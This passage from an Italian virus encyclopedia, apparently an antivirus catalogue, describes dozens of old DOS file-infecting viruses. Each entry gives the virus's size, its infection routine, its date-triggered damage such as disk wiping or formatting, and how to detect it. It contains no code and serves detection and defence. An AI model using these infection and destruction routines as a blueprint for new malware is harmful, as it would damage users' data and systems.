estensione *.COM nella cartella in uso. 2) Controlla quindi che sia giα stato infettato da Small115. Se "SI", continua a cercare ogni file non infetto con estensione *.COM. 3) Infine infetta tutti i file con estensione *.COM nella directory. Danni: I file infetti non possono essere eseguiti. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 115 Byte. Note: 1) Non rimane in memoria. 2) Small115 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Torm-263] Nome del Virus: Torm-263. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 263 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla quindi che sia giα stato infettato da TORM-263. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta in seguito tutti i file non infetti nella directory. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 263 Byte. Note: 1) Non rimane in memoria. 2) TORM-263 non intercetta l'INT 24h quando infetta i file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Radyum] Nome del Virus: Radyum. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 448 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia stato infettato da Radyum. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 448 Byte. Note: 1) Non rimane in memoria. 2) Radyum non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Psycho] Nome del Virus: Psycho. Tipo di Virus: Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.EXE o *.COM nella directory corrente. 2) Controlla che il file sia stato infettato da Psyco. Se "SI", continua a ricercare file con estensione *.COM od *.EXE non infetti. 3) Infetta in seguito tutti i file con estensione *.COM ed *.EXE nella directory. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file non aumenta. Note: 1) Non rimane in memoria. 2) Psycho non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [VCL9] Nome del Virus: Vcl9. Tipo di Virus: Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione*.COM od *.EXE nella directory corrente. 2) Controlla che il primo file trovato sia stato infettato da VCL9. Se "SI", continua a cercare ogni file con estensione *.COM ed *.EXE non infetto. 3) Infetta solo due file alla volta. Danni: Sovrascrive il file originale, cos∞ la lunghezza dei file infetti non aumenta. Note: 1) Non rimane in memoria. 2) VCL9 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Cheesy] Nome del Virus: Cheesy. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 381 Byte (EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.EXE nella directory corrente. 2) Quando trova un file con estensione *.EXE controlla che sia stato infettato da CHEESY. Se "SI", continua a cercare un file con estensione *.EXE non infetto. 3) Procede infettando tutti i file con estensione *.EXE nella directory. 4) Una volta che il file Φ eseguito il sistema si ferma. Danni: Blocco del sistema. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 381 Byte. Note: 1) Non rimane in memoria. 2) CHEESY non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Dutch] Nome del Virus: Dutch. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 358 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Quando trova un file controlla che sia stato infettato da Dutch. Se "SI", continua a cercare ogni file non infetto con estensione *.COM. 3) Infetta solo un file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 358 Byte. Note: 1) Non rimane in memoria. 2) Dutch non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Mini-2] Nome del Virus: Mini-2. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato il primo file con estensione *.COM, controlla che sia stato infettato da MINI-2. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta in seguito tutti i file con estensione *.COM nella directory. Danni: Sovrascrive il file originale, cos∞ la lunghezza dei file infetti non aumenta. Note: 1) Non rimane in memoria. 2) MINI-2 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Define-1] Nome del Virus: Define-1. Tipo di Virus: Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM od *.EXE nella directory corrente. 2) Una volta localizzato il file, controlla che sia giα stato infettato da Define-1. Se "SI", continua a cercare un altro file non infetto con estensione *.COM od *.EXE. 3) Infetta un solo file alla volta. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) Define-1 non intercetta INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [205] Nome del Virus: 205. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 205 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Quando trova un file con estensione *.COM, controlla che il file sia stato precedentemente infettato da 205. Se "SI", continua a cercare un file non infetto con estensione *.COM. 3) In seguito prosegue ad infettare tutti i file con estensione *.COM nella directory. 4) Infine esegue il file originale richiamato. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 205 Byte. Note: 1) Non rimane in memoria. 2) 205 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Banana] Nome del Virus: Banana. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Quando trova un file con estensione *.COM controlla che sia stato infettato da Banana. Se "SI", continua a cercare un altro file non infetto con estensione *.COM. 3) Continua quindi ad infettare tutti i file con estensione *.COM nella directory. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) Banana non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come protetto da scrittura). [334] Nome del Virus: 334. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 334 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file con estensione *.COM, controlla che sia giα stato infettato da 334. Se "SI", continua a cercare i file con estensione *.COM non infetti. 3) Infetta un file alla volta. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 334 Byte. Note: 1) Non rimane in memoria. 2) 334 non intercetta l'INT 24h quando infetta il file. Appare un messaggio in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Redx-1] Nome del Virus: Redx-1. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 796 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory C:\ principale. 2) Una volta localizzato un file con estensione *.COM, controlla che sia stato infettato da REDX-1. Se "SI", continua a cercare un file non infetto con estensione *.COM. 3) Infetta in seguito altri file con estensione *.COM, due alla volta. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 796 Byte. Note: 1) Non rimane in memoria. 2) REDX-1 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come protetto da scrittura). [Dismember] Nome del Virus: Dismember. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 288 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Una volta localizzato un file con estensione .COM, controlla che sia stato infettato da Dismember. Se "SI", continua a cercare file non infetti con estensione *.COM. 3) Infetta in seguito tutti file con estensione *.COM nella directory. 4) Infine esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 288 Byte. Note: 1) Non rimane in memoria. 2) Dismember non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Timid] Nome del Virus: Timid. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 306 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da Timid. Se "SI", continua a cercare file con estensione *.COM non infetti. 3) Infetta in seguito un file alla volta e mostra sullo schermo il nome del file infetto. 4) Una volta che il file Φ eseguito il sistema si blocca. Danni: Danneggia i file originali. Metodo di rilevazione: 1) Il file infetto incrementa le sue dimensioni di 306 Byte. 2) Altri nomi di file sono mostrati sullo schermo. Note: 1) Non rimane in memoria. 2) Timid non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Druid] Nome del Virus: Druid. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM nella directory corrente. 2) Una volta localizzato un file controlla che sia giα stato infettato da Druid. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta in seguito tutti i file con estensione *.COM nella directory. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) Druid non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Itti-B] Nome del Virus: Itti-B. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da ITTI-B. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta un solo file alla volta.. 4) Infine danneggia tutti i dati presenti sul disco se nessun file con estensione *.COM viene infettato. Danni: 1) Sovrascrive il file originale, cos∞ la lunghezza del file originale non aumenta. 2) Danneggia tutti i dati presenti sul disco se nessun file con estensione *.COM viene infettato. Note: 1) Non rimane in memoria. 2) ITTI-B non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come protetto da scrittura). [Itti-A] Nome del Virus: Itti-A. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file con estensione *.COM controlla che sia giα stato infettato da ITTI-A. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. Quando in seguito verrα eseguito il file, apparirα sullo schermo il seguente messaggio: "EXEC FAILURE" 4) Infine danneggia tutti i dati presenti sul disco se nessun file con estensione *.COM viene infettato. Danni: 1) Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. 2) Danneggia tutti i dati presenti sul disco se nessun file con estensione *.COM viene infettato. Note: 1) Non rimane in memoria. 2) ITTI-A non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Burger] Nome del Virus: Burger. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da Burger. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta un solo file alla volta. 4) Infine danneggia tutti i dati presenti sul disco se nessun file con estensione *.COM viene infettato. Danni: 1) Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. 2) Danneggia tutti i dati presenti sul disco se nessun file con estensione *.COM viene infettato. Note: 1) Non rimane in memoria. 2) Burger non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Bloodlust] Nome del Virus: Bloodlust. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file *.C* nella directory corrente. 2) Una volta localizzato un file controlla che sia giα stato infettato da Bloodlust. Se "SI", continua a cercare tutti i file *.C*. 3) Una volta localizzato un file *.C* non infetto, lo infetta e contina finchΘ tutti i file in C:\ non sono stati infettati. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) Bloodlust non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [ZY] Nome del Virus: Zy. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 463 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da ZY. Se "SI", continua a cercare ogni file con estensione *.COM. 3) Infetta solo un file alla volta. 4) Infine esegue il file originale.. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 463 Byte. Note: 1) Non rimane in memoria. 2) ZY non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Kode4-2] Nome del Virus: Kode4-2. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Cieca 3.000 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file *.C* nella directory corrente. 2) Infetta tutti i file *.C nella directory. 3) Appare il seguente messaggio sullo schermo: "-=+ Kode4 +=-, The one and ONLY!" Danni: Sovrascrive il file originale. Metodo di rilevazione: Cercare sullo schermo il messaggio: "-=+ Kode4 +=- The one and ONLY!" Note: 1) Non rimane in memoria. 2) Kode4-2 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Mini-212] Nome del Virus: Mini-212. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 212 o 300 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso partendo da un file che inizia con la lettera "A" e selezionandone altri casualmente arrivando alla lettera "Z". 2) Controlla che il file sia giα stato infettato da MINI-212. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 212 o 300 Byte. Note: 1) Non rimane in memoria. 2) MINI-212 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Anna] Nome del Virus: Anna. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 742 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che il file sia giα stato infettato da ANNA. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta un solo file alla volta. 4) Se non viene trovato nessun file infetto nella directory corrente, il virus continua a cercare un file non infetto in un'altra directory. 5) In seguito controlla la data di sistema. Se Φ dicembre apparirα sullo schermo il seguente messaggio: "Yole from the ARcV........." Danni: Nessuno. Metodo di rilevazione: 1) Il file infetto incrementa le sue dimensioni di 742 Byte. 2) Se Φ dicembre apparirα sullo schermo il seguente messaggio: "Yole from the ARcV........." Note: 1) Non rimane in memoria. 2) ANNA non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Grunt2] Nome del Virus: Grunt2. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 427 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da GRUNT2. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta un solo file alla volta. 4) In seguito controlla la data di sistema. Se Φ il 3 settembre di un anno successivo al 1993, cancella un file sul disco in uso ed in seguito appare sullo schermo il seguente messaggio: "S[GRUNT-2] -=> Agent Orange '92 <=- Rock of the Marne Sir!.......". Danni: Se la data di sistema corrisponde al giorno 3 settembre di un anno successivo al 1993, il virus cancella un file sul disco in uso. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 427 Byte. Note: 1) Non rimane in memoria. 2) GRUNT2 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [VDV-853] Nome del Virus: Vdv-853. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 853 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che la data di sistema corrisponda al giorno 24 o 26 dicembre. Se "SI", il virus cancella tutti i dati nella directory corrente. In seguito crea un file di 273 Byte e mostra il seguente messaggio: "Frhliche Weihnachten wnscht der Verband Deutscher Virenliebhaber Ach ja, und dann wnschen wir auch noch viel Spab beim Suchen nach den Daten von der Festplatte! Hello - Copyright S&S International, 1990". 2) Se "NO", cerca un file con estensione *.COM nella directory corrente. Una volta localizzato un file controlla che sia giα stato infettato da VDV-853. Se "SI", continua a cercare un file non infetto con estensione *.COM. c) Infetta solo quattro file alla volta. Danni: Se la data di sistema corrisponde al giorno 24 o 26 dicembre, il virus cancella tutti i dati nella directory corrente. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 853 Byte. Note: 1) Non rimane in memoria. 2) VDV-853 non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). 3) Virus pattern Φ lo stesso di "SON_OF_VSC_2". [Wild Thing] Nome del Virus: Wild-Thing. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 567 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che la data di sistema corrisponda a venerd∞. Se "SI", appare sullo schermo il seguente messaggio: " It's Friday ........ Enjoy the weekend with your computer![YAM '92]." Il sistema poi si blocca. 2) Se "NO", cerca un file con estensione *.COM nella directory corrente. Una volta localizzato un file controlla che sia giα stato infettato da Wild-Thing. Se "SI", continua a cercare un altro file con estensione *.COM non infetto. 3) Infetta tutti i file della directory e della directory principale finchΘ tutti i file con estensione *.COM saranno infettati. 4) In seguito esegue il file originale. Danni: Se la data di sistema corrisponde a venerd∞, appare il seguente messaggio: "It's Friday ....... Enjoy the weekend with your computer![YAM '92]." Il sistema poi si blocca.. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 567 Byte. Note: 1) Non rimane in memoria. 2) Wild-Thing non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Arcv-Fri] Nome del Virus: Arcv-Fri. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 839 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che la data di sistema sia il giorno 12 aprile; se "SI", cerca un file con estensione *.COM nella directory corrente, in seguito lo danneggia. 2) Se "No", cerca i file con estensione *.COM nella directory corrente. 3) Controlla che sia giα stato infettato da ARCV-FRI. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 4) Infetta solo un file alla volta. 5) In seguito esegue il file originale. Danni: Se la data di sistema corrisponde al giorno 12 aprile, il virus cerca i file con estensione *.COM nella directory corrente ed in seguito li danneggia. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 839 Byte. Note: 1) Non rimane in memoria. 2) ARCV-FRI non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Agent-B] Nome del Virus: Agent-B. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE ed i file con estensione *.COM). Lunghezza del Virus: 763 Byte (COM & EXE). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da Argent. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo due file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 763 Byte. Note: 1) Non rimane in memoria. 2) Argent intercetta l'INT 24h quando infetta i file. Tralascia l'errore di I/O (come per esempio protetto da scrittura). [Nanite] Nome del Virus: Nanite. Tipo di Virus: Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM od *.EXE nella directory corrente. 2) Una volta localizzato un file controlla che sia giα stato infettato da Nanite. Se "SI", continua a cercare ogni file con estensione *.COM od *.EXE non infetto. 3) Infetta tutti i file con estensione *.COM ed *.EXE finchΘ tutti i file nella directory corrente saranno stati infettati. Danni: Sovrascrive il file originale cos∞ la lunghezza del file non aumenta. Note: 1) Non rimane in memoria. 2) Nanite non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Arcv-670] Nome del Virus: Arcv-670. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 670 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da ARCV-670. Se "SI", continua a cercare ogni file non infetto con estensione *.COM. 3) Infetta un solo file alla volta. 4) Infine controlla la data di sistema. Se la data Φ tra i giorni 20 e 25 dicembre di un anno successivo al 1992, appare il seguente messaggio: "Happy Xmas from the ARCV", in seguito il sistema si blocca. Danni: Se la data Φ tra i giorni 20 e 25 dicembre di un anno successivo al 1992 appare questo messaggio: "Happy Xmas from the ARCV", in seguito il sistema si blocca. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 670 Byte. Note: 1) Non rimane in memoria. 2) ARCV-670 non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Why] Nome del Virus: Why. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 457 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da Why. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. 4) In seguito controlla la data di sistema. Se la data Φ il giorno 12 maggio o 25 febbraio, il virus danneggia tutti i file dell'hard disk. Danni: Se la data Φ il giorno 12 maggio o 25 febbraio, il virus danneggia tutti i file dell'hard disk. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 457 Byte. Note: 1) Non rimane in memoria. 2) "Why" non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [FCB] Nome del Virus: Fcb. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE ed *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file controlla che sia giα stato infettato da FCB. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. 4) Cerca i file con estensione *.EXE nella directory corrente. 5) Una volta localizzato un file controlla che sia giα stato infettato da FCB. Se "SI", continua a cercare ogni file con estensione *.EXE non infetto. 6) Infetta solo un file alla volta. Danni: Sovrascrive il file originale, cos∞ la lunghezza dei file infetti non aumenta. Note: 1) Non rimane in memoria. 2) FCB non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Casper] Nome del Virus: Casper. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 1.200 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che la data di sistema sia il giorno 1 aprile. Se "SI", formatta il disco in uso. Se "NO", cerca i file *.C* nella directory corrente. 2) Una volta localizzato un file controlla che sia giα stato infettato da FCB. Se "SI", continua a cercare ogni file *.C* non infetto. 3) Infetta solo un file alla volta. 4) In seguito esegue il file originale. Danni: Se la data di sistema corrisponde al giorno 1 aprile, formatta il disco in uso. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 1.200 Byte. Note: 1) Non rimane in memoria. 2) Casper non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Diogenes] Nome del Virus: Diogenes. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 946 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che la data di sistema corrisponda al giorno 31. Se "SI", danneggia tutti i dati dell'hard disk ed in seguito mostra sullo schermo il seguente messaggio: "DIOGENES 2.0 has visited your hard drive...... This has been another fine product of the Lehigh Valley...Watch (out) for future 'upgrades'.. ... The world's deceit has raped my soul. We melt the plastic people down, then we melt their plastic town." Se "NO', cerca i file con estensione *.COM nella directory corrente. 2) Una volta localizzato un file controlla che sia giα stato infettato da Diogenes. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. Danni: Se la data di sistema corrisponde al giorno 31, danneggia tutti i file dell'hard disk. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 946 Byte. Note: 1) Non rimane in memoria. 2) Diogenes non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Brothers-2] Nome del Virus: Brothers-2 Tipo di Virus: Virus da file (infetta i file con estensione *.COM) Lunghezza del Virus: 693 Byte (COM) Vettore PC agganciato: Nessuno Procedura eseguita: 1) Controlla che la data di sistema corrisponda al giorno 11 novembre o 25 dicembre. Se "SI", mostra il seguente messaggio: "Brotherhood... I am seeking my brothers "DEICIDE" and "MORGOTH"," ed esegue il file originale. Se "NO', cerca i file con estensione *.COM nella directory corrente. 2) Una volta localizzato un file controlla che sia giα stato infettato da Brothers-2. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Controlla che la seconda parola del file con estensione *.COM sia "0xADDE". Se "SI", mostra il messaggio: "Found my brother MORGOTH!!!." In seguito esegue il file originale. 4) Inoltre controlla che la seconda parola del file con estensione *.COM sia "0x0D90". Se "SI", mostra il messaggio: "Found my brother "DEIGOTH" !!!". In seguito esegue il file originale. 5) Se "NO", infetta i file con estensione *.COM, uno alla volta. 6) Esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 693 Byte. Note: 1) Non rimane in memoria. 2) Brothers-2 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Mindless] Nome del Virus: Mindless. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che la data di sistema corrisponda a domenica. Se "SI", danneggia tutti i file dell'hard disk. Se "NO", cerca i file *.C* nella directory corrente. 2) Una volta localizzato un file, lo infetta e continua a cercare file *.C* finchΘ tutti i file nella directory corrente non siano stati infettati. Danni: 1) Se la data di sistema corrisponde a domenica, danneggia tutti i file dell'hard disk. 2) Sovrascrive il file originale, cos∞ la lunghezza dei file infetti non aumenta. Metodo di rilevazione: Nessuno Note: 1) Non rimane in memoria. 2) Mindless non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Acme] Nome del Virus: Acme. Tipo di Virus: Virus da file (Companion Virus). Lunghezza del Virus: 932 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Controlla che l'ora di sistema sia successiva alle quattro del pomeriggio. Se "SI", viene prodotto un suono e il sistema si blocca. Se "NO', cerca un file con estensione *.EXE nella directory corrente. 3) In seguito crea un file con estensione *.COM di 923 Byte, "hidden & read-only" dandogli un'estensione *.EXE. Danni: Se l'ora di sistema 